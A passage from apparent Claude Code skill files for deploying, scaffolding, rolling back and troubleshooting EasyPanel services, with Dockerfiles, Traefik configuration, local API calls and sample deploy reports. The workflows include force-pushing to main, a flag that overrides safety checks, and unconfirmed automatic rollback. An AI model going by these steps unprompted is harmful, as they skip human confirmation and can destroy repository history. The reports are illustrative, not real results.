[00:25] ✅ Git push (commit: a3f5c21)
[01:55] ✅ EasyPanel build started
[03:42] ✅ Container started (dashboard-api-6f9d8)
[03:50] ✅ Health check 1/5: 200 OK
[03:52] ✅ Health check 5/5: 200 OK (stable)
[04:00] ✅ Metrics validated (CPU: 12%, RAM: 45MB/512MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
✅ DEPLOY SUCCESS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📊 Metrics:
- Total time: 4m 0s (vs ~60min manual, -93%)
- Build time: 1m 34s
- Image size: 82MB (-80% vs non-multi-stage)
- Cold start: 2.1s
- Memory usage: 45MB / 512MB (8.8%)
- CPU usage: 12% (avg first 60s)
🌐 Endpoints:
- Production: https://domain.descomplicar.pt
- Health: https://domain.descomplicar.pt/health
📋 Logs:
- EasyPanel: https://easy.descomplicar.pt/services/<service>/logs
- Gitea: https://git.descomplicar.pt/org/repo/actions
🔔 Next Steps:
1. Monitor uptime (first 24h critical)
2. Check error rate (should be <1%)
3. Load testing (optional, recommended)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
```
## Output Format (Failed)
```
❌ DEPLOY FAILED
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
⏱️ TIMELINE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[00:00] ✅ Pre-deploy validation
[00:15] ✅ Tests passed
[00:20] ✅ Local build
[00:25] ✅ Git push
[01:55] ✅ EasyPanel build started
[03:42] ✅ Container started
[03:50] ❌ Health check 1/5: 502 Bad Gateway
[04:00] ❌ Health check 2/5: 502 Bad Gateway
[04:10] ❌ Health check 3/5: 502 Bad Gateway
[04:20] ❌ HEALTH CHECK FAILED (3/5 retries)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔴 ERROR DETAILS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Issue: Health endpoint not responding (502)
Likely cause: Port mismatch or app crash
Logs (last 20 lines):
> Error: listen EADDRINUSE: address already in use :::8080
> at Server.setupListenHandle [as _listen2]
Root cause detected: App listening on port 8080, Traefik expects 3000
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔄 AUTO-ROLLBACK
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[04:25] ⏪ Rolling back to previous version (commit: 7d3a1f2)
[04:30] ✅ Rollback complete
[04:35] ✅ Health check: 200 OK (service restored)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🛠️ RECOMMENDED FIXES
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
1. Update Dockerfile EXPOSE: Change 8080 → 3000
OR
2. Update docker-compose.yml Traefik label:
traefik.http.services.X.loadbalancer.server.port=8080
3. Test fix locally: docker build && docker run
4. Commit fix + redeploy: /easypanel-deploy
🔍 Troubleshooting:
/easypanel-troubleshoot <service-name>
```
## Auto-Rollback Logic
**Trigger Conditions:**
- Health check fails 3/5 times
- Container crashes dentro de 60s
- Metrics críticos (CPU > 95%, Memory OOM)
**Rollback Actions:**
1. Identificar último commit estável (health OK)
2. `git revert` ou `git checkout`
3. Force push para trigger redeploy
4. Aguardar health check OK
5. Report success/fail
## Flags
### --skip-tests
```bash
/easypanel-deploy --skip-tests
```
**Quando usar:**
- CI/CD já executou tests
- Tests demoram muito (>5min)
- Deploy de hotfix urgente
### --force
```bash
/easypanel-deploy --force
```
**Quando usar:**
- Ignorar validation warnings
- Deploy apesar de score < 7/10
- Override safety checks
**⚠️ ATENÇÃO:** Usar apenas se souber o que está a fazer.
## Integration com CI/CD
```yaml
# .gitea/workflows/deploy.yml
steps:
- name: Deploy
run: |
/easypanel-deploy --skip-tests
env:
EASYPANEL_TOKEN: ${{ secrets.EASYPANEL_TOKEN }}
```
## API Endpoints Usados
Ver skill `/easypanel-api` para documentação completa.
| Acção | Endpoint |
|-------|----------|
| Deploy serviço | `POST services.app.deployService` |
| Redeploy | `POST services.app.redeployService` |
| Estado serviço | `GET services.app.inspectService` |
| Logs | `GET services.app.getServiceLogs` |
## MCPs Necessários
-`ssh-unified` - Acesso ao servidor para executar comandos API
-`gitea` - Git operations e push
## Tools Necessários
```bash
# Git
git status
git add .
git commit
git push
# Docker
docker build
docker stats
# Curl
curl -f https://domain/health
```
## Metrics Tracking
Após deploy, gravar métricas:
```sql
INSERT INTO tblskill_metrics (
skill_name, duration_ms, success,
build_time_ms, image_size_mb, deploy_time_ms,
health_check_status, cpu_avg, ram_mb
) VALUES (
'/easypanel-deploy', DURATION, SUCCESS,
BUILD_TIME, IMAGE_SIZE, DEPLOY_TIME,
'ok', CPU, RAM
);
```
## Checklist Execução
- [ ] Executar /easypanel-validate
- [ ] Check score >= 7/10
- [ ] Run tests (se não --skip-tests)
- [ ] Build local test
- [ ] Verificar uncommitted changes
- [ ] Push to Gitea
- [ ] Monitor build EasyPanel
- [ ] Health check (5 retries)
- [ ] Validate metrics (CPU, RAM)
- [ ] Report success ou trigger rollback
- [ ] Log metrics
---
**Versão:** 1.0.0 | **Autor:** Descomplicar® | **Data:** 2026-02-04
## Metadata (Desk CRM Task #65)
```
Tarefa: SKL: /easypanel-deploy - Automated Deploy + Validation
Milestone: 294 (Skills Claude Code)
Tags: skill(79), stackworkflow(75), claude-code(81), activo(116)
Responsáveis: Emanuel(1), AikTop(25)
Status: 4 (Em progresso) → 5 (Concluído)
```
---
**/** @author Descomplicar® | @link descomplicar.pt | @copyright 2026 **/

475
infraestrutura/skills/easypanel-init/SKILL.md Normal file
View File

@@ -0,0 +1,475 @@
---
name: easypanel-init
description: Initialize EasyPanel projects with proper configuration via API oficial. Sets up Node.js,
PHP, or static sites on EasyPanel. Use when user mentions "easypanel init", "new
easypanel", "setup easypanel", "deploy easypanel", "easypanel setup".
author: Descomplicar® Crescimento Digital
version: 2.0.0
quality_score: 70
user_invocable: true
desk_task: TBD
allowed-tools: Task
dependencies:
- easypanel-api
---
# EasyPanel Init
Scaffold automático de projectos optimizados para deploy no EasyPanel.
## Quando Usar
- Iniciar novo projecto do zero
- Converter projecto existente para EasyPanel
- Setup rápido com best practices
- Criar estrutura standardizada
- Prototype rapidamente
## Sintaxe
```bash
/easypanel-init <project-name> <domain> [--type nodejs|python|go] [--db postgres|mysql|none]
```
## Exemplos
```bash
# Node.js API sem database
/easypanel-init dashboard-api dashboard.descomplicar.pt --type nodejs
# Node.js API com PostgreSQL
/easypanel-init crm-api crm.descomplicar.pt --type nodejs --db postgres
# Python API (futuro)
/easypanel-init ml-api ml.descomplicar.pt --type python
# Go API (futuro)
/easypanel-init fast-api api.descomplicar.pt --type go
```
## Workflow Completo
### 1. Criar Estrutura de Pastas
```
project-root/
├── src/
│ ├── index.ts (ou main.py, main.go)
│ └── routes/
│ └── health.ts
├── Dockerfile (template multi-stage)
├── docker-compose.yml (Traefik labels)
├── .dockerignore
├── .gitignore
├── .env.example
├── package.json (scripts padronizados)
├── tsconfig.json (se TypeScript)
├── .gitea/
│ └── workflows/
│ └── deploy.yml (CI/CD)
└── README.md (deploy guide)
```
### 2. Generate Templates
#### Dockerfile (Multi-stage Node.js)
```dockerfile
# Stage 1: Dependencies
FROM node:22-alpine AS deps
WORKDIR /app
COPY package*.json ./
RUN npm ci --only=production
# Stage 2: Builder
FROM node:22-alpine AS builder
WORKDIR /app
COPY package*.json ./
RUN npm ci
COPY . .
RUN npm run build
# Stage 3: Runner
FROM node:22-alpine AS runner
WORKDIR /app
ENV NODE_ENV=production
COPY --from=deps /app/node_modules ./node_modules
COPY --from=builder /app/dist ./dist
COPY package*.json ./
RUN addgroup -g 1001 -S nodejs && \
adduser -S nodejs -u 1001
USER nodejs
EXPOSE 3000
HEALTHCHECK --interval=30s --timeout=3s --start-period=5s --retries=3 \
CMD node -e "require('http').get('http://localhost:3000/health', (r) => {process.exit(r.statusCode === 200 ? 0 : 1)})"
CMD ["npm", "start"]
```
#### docker-compose.yml (Traefik)
```yaml
version: '3.8'
services:
app:
build: .
restart: unless-stopped
ports:
- "3000:3000"
environment:
- NODE_ENV=production
- PORT=3000
networks:
- traefik
labels:
- "traefik.enable=true"
- "traefik.http.routers.PROJECTNAME.rule=Host(`DOMAIN`)"
- "traefik.http.routers.PROJECTNAME.entrypoints=websecure"
- "traefik.http.routers.PROJECTNAME.tls.certresolver=letsencrypt"
- "traefik.http.services.PROJECTNAME.loadbalancer.server.port=3000"
- "traefik.http.services.PROJECTNAME.loadbalancer.healthcheck.path=/health"
- "traefik.http.services.PROJECTNAME.loadbalancer.healthcheck.interval=10s"
networks:
traefik:
external: true
```
#### Health Endpoint (Express)
```typescript
import { Router } from 'express'
import type { Request, Response } from 'express'
const router = Router()
router.get('/health', (req: Request, res: Response) => {
res.status(200).json({
status: 'ok',
timestamp: new Date().toISOString(),
uptime: process.uptime(),
environment: process.env.NODE_ENV || 'development'
})
})
export default router
```
#### Gitea Workflow (.gitea/workflows/deploy.yml)
```yaml
name: Deploy to EasyPanel
on:
push:
branches:
- main
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
- name: Setup Node.js
uses: actions/setup-node@v3
with:
node-version: '22'
- name: Install dependencies
run: npm ci
- name: Run tests
run: npm test
- name: Build
run: npm run build
- name: Trigger EasyPanel Deploy
run: |
curl -X POST ${{ secrets.EASYPANEL_WEBHOOK_URL }}
```
#### package.json (scripts)
```json
{
"name": "PROJECT_NAME",
"version": "1.0.0",
"type": "module",
"scripts": {
"dev": "tsx watch src/index.ts",
"build": "tsc",
"start": "node dist/index.js",
"lint": "eslint .",
"test": "vitest"
}
}
```
#### README.md
```markdown
# PROJECT_NAME
## Setup Local
1. npm install
2. cp .env.example .env.local
3. npm run dev
## Deploy EasyPanel
1. Push to main: `git push origin main`
2. CI/CD auto-deploy via Gitea Actions
3. Health check: https://DOMAIN/health
## Environment Variables
See `.env.example` for required variables.
## Architecture
- Multi-stage Docker build (80% smaller image)
- Traefik routing with SSL
- Health checks every 10s
- Non-root user for security
```
### 3. Initialize Git
```bash
git init
git add .
git commit -m "chore: initial project setup via /easypanel-init"
```
### 4. Criar Projecto no EasyPanel via API
```bash
# Obter token
TOKEN=$(cat /etc/easypanel/.api-token)
# Criar projecto
curl -s -X POST "http://localhost:3000/api/trpc/projects.createProject" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"name":"PROJECT_NAME"}}'
# Criar serviço app
curl -s -X POST "http://localhost:3000/api/trpc/services.app.createService" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"projectName":"PROJECT_NAME","serviceName":"app"}}'
# Configurar domínio
curl -s -X POST "http://localhost:3000/api/trpc/services.app.saveDomains" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"projectName":"PROJECT_NAME","serviceName":"app","domains":[{"host":"DOMAIN"}]}}'
# Configurar Git source
curl -s -X POST "http://localhost:3000/api/trpc/services.app.saveGithubSource" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"projectName":"PROJECT_NAME","serviceName":"app","owner":"ORG","repo":"REPO","ref":"refs/heads/main","autoDeploy":true}}'
```
### 5. Optional: Push to Gitea
```bash
# Criar repo via MCP Gitea
mcp__gitea__create_repo({
name: PROJECT_NAME,
private: false,
auto_init: false
})
# Add remote and push
git remote add origin git@git.descomplicar.pt:ORG/PROJECT_NAME.git
git push -u origin main
```
### 5. Output Summary
```
✅ Project scaffolded: PROJECT_NAME
📁 Structure created:
- Dockerfile (multi-stage, 3 layers, ~80MB final image)
- docker-compose.yml (Traefik configured for DOMAIN)
- Health endpoint: src/routes/health.ts
- CI/CD: .gitea/workflows/deploy.yml
- README.md (deploy guide + troubleshooting)
🔧 Configuration:
- Domain: DOMAIN
- Port: 3000
- Node.js: 22-alpine
- Health check: GET /health
📦 Next Steps:
1. cd PROJECT_NAME
2. npm install
3. cp .env.example .env.local && edit .env.local
4. npm run dev (test locally)
5. git push origin main (trigger deploy)
📚 Documentation:
- README.md: Quick start
- Checklist: Use /easypanel-validate before deploy
🚀 EasyPanel Setup:
1. Create service → Custom (Docker Compose)
2. Connect repository: git.descomplicar.pt/ORG/PROJECT_NAME
3. Set environment variables (copy from .env.example)
4. Create webhook (for CI/CD)
5. Deploy
⏱️ Estimated setup time: 5min (vs 30min manual)
```
## Database Support (--db)
### PostgreSQL
Adiciona ao docker-compose.yml:
```yaml
services:
db:
image: postgres:16-alpine
restart: unless-stopped
environment:
POSTGRES_DB: ${DB_NAME}
POSTGRES_USER: ${DB_USER}
POSTGRES_PASSWORD: ${DB_PASSWORD}
volumes:
- postgres_data:/var/lib/postgresql/data
networks:
- traefik
volumes:
postgres_data:
```
Adiciona a .env.example:
```
DATABASE_URL=postgresql://${DB_USER}:${DB_PASSWORD}@db:5432/${DB_NAME}
```
### MySQL
Similar ao PostgreSQL, usando `mysql:8-alpine`.
## Type Support (--type)
### nodejs (default)
- Node.js 22-alpine
- TypeScript + ESM
- tsx para dev
- Express boilerplate
### python (futuro)
- Python 3.12-alpine
- FastAPI boilerplate
- poetry para dependencies
- uvicorn para server
### go (futuro)
- Go 1.21-alpine
- Gin ou Echo boilerplate
- Multi-stage build (builder + runtime)
- Binário estático
## API Endpoints Usados
Ver skill `/easypanel-api` para documentação completa.
| Acção | Endpoint |
|-------|----------|
| Criar projecto | `POST projects.createProject` |
| Criar serviço | `POST services.app.createService` |
| Configurar domínio | `POST services.app.saveDomains` |
| Configurar Git source | `POST services.app.saveGithubSource` |
| Deploy inicial | `POST services.app.deployService` |
## Validation
Após scaffold, executar automaticamente:
```bash
/easypanel-validate
```
Se score < 9/10, reportar issues.
## Templates Base
Usar templates de:
`/media/ealmeida/Dados/Dev/Docs/EasyPanel-Deploy-Research/`
- TEMPLATE_Dockerfile_NodeJS_MultiStage
- TEMPLATE_docker-compose.yml
- TEMPLATE_gitea-workflow-deploy.yml
- TEMPLATE_health-endpoint.ts
## Customização
User pode customizar após scaffold:
- Port (default 3000)
- Node version (default 22)
- Package manager (npm, pnpm, yarn)
- Framework (Express, Fastify, Koa)
## Checklist Execução
- [ ] Verificar nome projecto válido (lowercase, no spaces)
- [ ] Verificar domain válido (DNS format)
- [ ] Criar estrutura pastas
- [ ] Gerar Dockerfile multi-stage
- [ ] Gerar docker-compose.yml com Traefik labels
- [ ] Criar health endpoint
- [ ] Gerar .dockerignore
- [ ] Gerar .gitignore
- [ ] Gerar .env.example
- [ ] Criar package.json com scripts
- [ ] Gerar tsconfig.json (se TS)
- [ ] Criar CI/CD workflow
- [ ] Gerar README.md
- [ ] Git init
- [ ] Git commit inicial
- [ ] Executar /easypanel-validate
- [ ] Output summary com next steps
---
**Versão:** 1.0.0 | **Autor:** Descomplicar® | **Data:** 2026-02-04
## Metadata (Desk CRM Task #65)
```
Tarefa: SKL: /easypanel-init - Scaffold EasyPanel Project
Milestone: 294 (Skills Claude Code)
Tags: skill(79), stackworkflow(75), claude-code(81), activo(116)
Responsáveis: Emanuel(1), AikTop(25)
Status: 4 (Em progresso) → 5 (Concluído)
```
---
**/** @author Descomplicar® | @link descomplicar.pt | @copyright 2026 **/
---
## Quando NÃO Usar
- Para tarefas fora do domínio de especialização desta skill
- Quando outra skill mais específica está disponível
- Para operações que requerem confirmação manual do utilizador

472
infraestrutura/skills/easypanel-rollback/SKILL.md Normal file
View File

@@ -0,0 +1,472 @@
---
name: easypanel-rollback
description: Rollback EasyPanel deployments to previous versions via API oficial. Safely reverts to
last working deployment. Use when user mentions "easypanel rollback", "reverter
deploy", "rollback deployment", "previous version", "desfazer deploy".
author: Descomplicar® Crescimento Digital
version: 2.0.0
quality_score: 70
user_invocable: true
desk_task: TBD
allowed-tools: Task
dependencies:
- easypanel-api
---
# EasyPanel Rollback
Rollback rápido e seguro para versões anteriores estáveis.
## Quando Usar
- Deploy falhou (health checks fail)
- Aplicação com erros em produção
- Rollback urgente necessário
- Testar versão anterior
- Recovery após incidente
## Sintaxe
```bash
/easypanel-rollback <service-name> [--to-version <version>] [--auto]
```
## Exemplos
```bash
# Rollback para versão anterior imediata
/easypanel-rollback dashboard-api
# Rollback para tag específica
/easypanel-rollback dashboard-api --to-version v1.2.5
# Rollback automático (sem confirmação)
/easypanel-rollback dashboard-api --auto
```
## Workflow Completo
### 1. List Recent Versions
```bash
git log --oneline -n 10
git tag --sort=-creatordate | head -n 10
```
**Output:**
```
v1.3.0 (current) ❌ FAILING - Health: 502
v1.2.5 (previous) ✅ STABLE - Health: 200 OK, Uptime: 99.8%
v1.2.4 ✅ STABLE
v1.2.3 ✅ STABLE
```
**Metadata tracking:**
- Commit SHA
- Deploy timestamp
- Health status (last known)
- Uptime percentage (if tracked)
- Issue description (se falhou)
### 2. Select Target Version
**Strategies:**
#### A. Interactive (default)
```
➜ Rollback to: [2] v1.2.5 (recommended)
Available versions:
1. v1.3.0 (current) ❌ FAILING
2. v1.2.5 (previous) ✅ STABLE (recommended)
3. v1.2.4 ✅ STABLE
4. v1.2.3 ✅ STABLE
Enter number [2]:
```
#### B. Automatic (--auto)
```
Last known good: v1.2.5 (health OK, deployed 2h ago)
Auto-selecting v1.2.5...
```
#### C. Specific (--to-version)
```
Target version specified: v1.2.5
Validating...
```
### 3. Confirm Rollback (se não --auto)
```
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📋 ROLLBACK PLAN
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Current: v1.3.0 (a3f5c21) - Port mismatch issue
Target: v1.2.5 (7d3a1f2) - Stable, 99.8% uptime
Changes (diff):
- src/server.ts: PORT 8080 → 3000
- docker-compose.yml: Traefik port fix
+ Reverts 3 commits
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Confirm rollback? [Y/n]:
```
### 4. Perform Rollback
**Method A: Git Revert (small rollback, 1-3 commits)**
```bash
git revert --no-commit a3f5c21..HEAD
git commit -m "revert: rollback to v1.2.5 due to port mismatch"
```
**Method B: Git Checkout (large rollback, >3 commits)**
```bash
git checkout 7d3a1f2
git checkout -b rollback-to-v1.2.5
git push origin rollback-to-v1.2.5:main --force
```
### 5. Push & Redeploy
```bash
git push origin main
```
**Via API (preferido - sincroniza com GUI):**
```bash
# Obter token
TOKEN=$(cat /etc/easypanel/.api-token)
# Trigger redeploy via API
curl -s -X POST "http://localhost:3000/api/trpc/services.app.redeployService" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"json":{"projectName":"PROJECT","serviceName":"SERVICE"}}'
```
**Se CI/CD configurado:**
- Trigger automático via webhook
- Aguardar build (timeout 5min)
### 6. Monitor Rollback
```bash
# Poll EasyPanel deploy
docker service ps <service>
docker service logs <service> --tail 50 --follow
```
**Timeline:**
```
[00:00] ✅ Git revert completed
[00:05] ✅ Push to Gitea
[01:45] ✅ EasyPanel build started
[03:20] ✅ Container started
[03:28] ✅ Health check: 200 OK
```
### 7. Validate Rollback
#### Health Check (5 retries)
```bash
curl -f https://domain/health
```
**Expected:** 200 OK
#### Logs Check
```bash
docker logs <container> --tail 100 | grep -i error
```
**Expected:** No critical errors
#### Metrics Check
```bash
docker stats <container> --no-stream
```
**Expected:**
- CPU < 80%
- RAM < 80%
- No OOM kills
### 8. Success Report
```
✅ ROLLBACK COMPLETE
Total time: 3m 30s
Service restored: https://domain.descomplicar.pt
Health: ✅ 200 OK
Version: v1.2.5 (7d3a1f2)
🛠️ NEXT STEPS
1. Investigate root cause: /easypanel-troubleshoot
2. Fix issues locally
3. Test fix: docker build + docker run
4. Redeploy: /easypanel-deploy
```
## Output Format (Success)
```
🔄 EasyPanel Rollback: dashboard-api
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📜 AVAILABLE VERSIONS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
1. v1.3.0 (current) ❌ FAILING
- Commit: a3f5c21
- Deployed: 15min ago
- Health: 502 Bad Gateway
- Issue: Port mismatch
2. v1.2.5 (previous) ✅ STABLE
- Commit: 7d3a1f2
- Deployed: 2h ago
- Health: 200 OK (before upgrade)
- Uptime: 99.8% (last 7 days)
3. v1.2.4 ✅ STABLE
- Commit: 9c4b3a1
- Deployed: 1 day ago
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
➜ Rollback to: v1.2.5 (recommended)
Confirm? [Y/n]: y
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
⏱️ ROLLBACK IN PROGRESS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[00:00] ✅ Git revert (a3f5c21 → 7d3a1f2)
[00:05] ✅ Commit rollback
[00:10] ✅ Push to Gitea
[01:45] ✅ EasyPanel redeploy started
[03:20] ✅ Container started
[03:28] ✅ Health check: 200 OK
[03:30] ✅ Metrics validated (CPU: 11%, RAM: 42MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
✅ ROLLBACK COMPLETE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Total time: 3m 30s
Service restored: https://dashboard.descomplicar.pt
Health: ✅ 200 OK
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🛠️ NEXT STEPS
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
1. Investigate root cause of v1.3.0 failure
→ /easypanel-troubleshoot dashboard-api
2. Fix issues locally
→ Update Dockerfile EXPOSE port
3. Test fix locally
→ docker build + docker run + test
4. Redeploy
→ /easypanel-deploy
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📝 ROLLBACK LOGGED
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Desk CRM Task #1502: Comment added
Gitea: Rollback commit pushed (4e8a9c3)
```
## Output Format (Failed)
```
❌ ROLLBACK FAILED
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
⏱️ TIMELINE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[00:00] ✅ Git revert
[00:05] ✅ Push to Gitea
[01:45] ✅ Build started
[03:20] ✅ Container started
[03:28] ❌ Health check: 500 Internal Server Error
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔴 ERROR
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Target version v1.2.5 also failing after rollback
Possible causes:
- Database schema incompatibility
- Environment variable missing
- External dependency changed
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🚨 MANUAL INTERVENTION REQUIRED
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
1. Check logs: /easypanel-troubleshoot dashboard-api
2. Verify database migrations
3. Check environment variables
4. Consider rollback to v1.2.4 (older stable)
```
## Flags
### --auto
Selecção automática da "last known good version":
- Versão anterior com health OK
- Sem confirmação interactiva
- Deploy imediato
**Uso em automation:**
```bash
# Triggered by monitoring alert
if [[ $(curl -s -o /dev/null -w "%{http_code}" https://domain/health) != "200" ]]; then
/easypanel-rollback dashboard-api --auto
fi
```
### --to-version
Especificar versão alvo exacta:
```bash
/easypanel-rollback dashboard-api --to-version v1.2.3
```
**Validações:**
- Versão existe? (git tag)
- Versão não é actual
- Versão é anterior (não futura)
## Version Metadata Tracking
**Stored in:** `.easypanel/deploy-history.json`
```json
{
"versions": [
{
"tag": "v1.2.5",
"commit": "7d3a1f2",
"timestamp": "2026-02-04T10:30:00Z",
"health_status": "ok",
"health_checks": 1523,
"health_failures": 3,
"uptime_percentage": 99.8,
"deploy_duration_ms": 180000,
"image_size_mb": 82,
"rollback_safe": true
}
]
}
```
## Integration com /easypanel-deploy
Quando `/easypanel-deploy` detecta falha, chama automaticamente:
```bash
/easypanel-rollback --auto
```
## API Endpoints Usados
Ver skill `/easypanel-api` para documentação completa.
| Acção | Endpoint |
|-------|----------|
| Inspeccionar serviço | `GET services.app.inspectService` |
| Redeploy | `POST services.app.redeployService` |
| Obter logs | `GET services.app.getServiceLogs` |
| Estado serviço | `GET services.app.inspectService` |
## MCPs Necessários
-`gitea` - Git operations e tags
-`ssh-unified` - Acesso ao servidor para API
-`desk-crm-v3` - Log rollback em comentário tarefa
## Tools Necessários
```bash
# Git
git log
git tag
git revert
git checkout
git push --force (com cuidado!)
# Docker
docker service ps
docker logs
# Curl
curl -f https://domain/health
```
## Safety Checks
1. **Backup actual state** antes de rollback
2. **Validate target version** existe
3. **Check database migrations** compatibility
4. **Confirm with user** (excepto --auto)
5. **Monitor rollback** até health OK
## Checklist Execução
- [ ] List recent versions (git log + tags)
- [ ] Fetch deploy history metadata
- [ ] Select target version (interactive/auto/specific)
- [ ] Show rollback plan + diff
- [ ] Confirm with user (se não --auto)
- [ ] Backup actual state
- [ ] Perform git revert ou checkout
- [ ] Commit rollback
- [ ] Push to Gitea
- [ ] Monitor redeploy (5min timeout)
- [ ] Health check (5 retries)
- [ ] Validate logs (no errors)
- [ ] Validate metrics (CPU, RAM)
- [ ] Report success ou fail
- [ ] Log rollback em Desk CRM
---
**Versão:** 1.0.0 | **Autor:** Descomplicar® | **Data:** 2026-02-04
## Metadata (Desk CRM Task #65)
```
Tarefa: SKL: /easypanel-rollback - Automated Rollback
Milestone: 294 (Skills Claude Code)
Tags: skill(79), stackworkflow(75), claude-code(81), activo(116)
Responsáveis: Emanuel(1), AikTop(25)
Status: 4 (Em progresso) → 5 (Concluído)
```
---
**/** @author Descomplicar® | @link descomplicar.pt | @copyright 2026 **/
---
## Quando NÃO Usar
- Para tarefas fora do domínio de especialização desta skill
- Quando outra skill mais específica está disponível
- Para operações que requerem confirmação manual do utilizador

293
infraestrutura/skills/easypanel-troubleshoot/SKILL.md Normal file
View File

@@ -0,0 +1,293 @@
---
name: easypanel-troubleshoot
description: >
Automated diagnostics for EasyPanel deployment issues via API oficial. Analyzes container logs,
health endpoints, Traefik routing, and resources to identify root causes.
Use when user mentions "easypanel troubleshoot", "deploy failed", "502 error",
"crash loop", "container problems", "debug deployment".
author: Descomplicar® Crescimento Digital
version: 2.0.0
quality_score: 70
user_invocable: true
desk_task: TBD
allowed-tools: Bash, Read
dependencies:
- easypanel-api
---
# EasyPanel Troubleshoot
Diagnóstico automático e inteligente de problemas de deploy no EasyPanel.
## Quando Usar
- Deploy falhou com erros 502/503
- Container em crash loop (restarts frequentes)
- Health endpoint não responde
- Problemas de routing Traefik
- Investigar causa de deploy falhado
- After deploy validation
## Quando NÃO Usar
- Para deploys iniciais (usar `/easypanel-init`)
- Para rollbacks de versão (usar `/easypanel-rollback`)
- Para validação pós-deploy bem-sucedido (usar `/easypanel-validate`)
- Quando o problema é conhecido e a solução já está identificada
## Sintaxe
```bash
/easypanel-troubleshoot <service-name> [--verbose]
```
## Exemplos
```bash
# Diagnóstico básico
/easypanel-troubleshoot dashboard-api
# Diagnóstico detalhado (logs completos)
/easypanel-troubleshoot dashboard-api --verbose
```
## Workflow Automático
### 1. Check Service Status via API
```bash
# Obter token
TOKEN=$(cat /etc/easypanel/.api-token)
# Inspeccionar serviço (estado completo)
curl -s "http://localhost:3000/api/trpc/services.app.inspectService?input=$(echo -n '{"json":{"projectName":"PROJECT","serviceName":"SERVICE"}}' | jq -sRr @uri)" \
-H "Authorization: Bearer $TOKEN" | jq '.result.data.json'
# Obter logs via API
curl -s "http://localhost:3000/api/trpc/services.app.getServiceLogs?input=$(echo -n '{"json":{"projectName":"PROJECT","serviceName":"SERVICE","lines":100}}' | jq -sRr @uri)" \
-H "Authorization: Bearer $TOKEN"
```
### 2. Fetch Logs (alternativa SSH)
```bash
docker logs <container> --tail 100
```
Parse de erros comuns:
- Port already in use (EADDRINUSE)
- Cannot find module (dependencies)
- Connection refused (database)
- Out of memory (OOM)
- Unhandled promise rejection
- Listen errors
### 3. Check Health Endpoint
```bash
curl https://<domain>/health
```
- Status code: 200, 404, 502, 503?
- Response time
- Response body validation
### 4. Check Traefik Routing
- Traefik labels correctos?
- router.rule com domain
- service.loadbalancer.server.port
- entrypoints=websecure
- certresolver=letsencrypt
- Domain DNS aponta para servidor?
- SSL certificate válido?
### 5. Check Port Mismatch
- Dockerfile EXPOSE vs app actual port
- docker-compose ports vs Traefik port
- App listening port (from logs)
- Common mismatch: 3000 vs 8080
### 6. Check Environment Variables
- Required vars set? (compare .env.example)
- Sensitive vars (DATABASE_URL, API_KEY)
- Missing vars causing app crash?
### 7. Check Dependencies
- Database reachable? (if applicable)
- Redis reachable? (if applicable)
- External APIs responding?
### 8. Check Resources
- CPU throttling?
- Memory limit reached (OOM)?
- Disk space?
### 9. Generate Report
- Issues found (prioritized: CRITICAL, WARNING, INFO)
- Root cause (if detected)
- Recommended fixes (step-by-step)
- Commands to run
## Error Pattern Detection
### Port Mismatch
```
Pattern: "listening on port X" + Traefik port Y
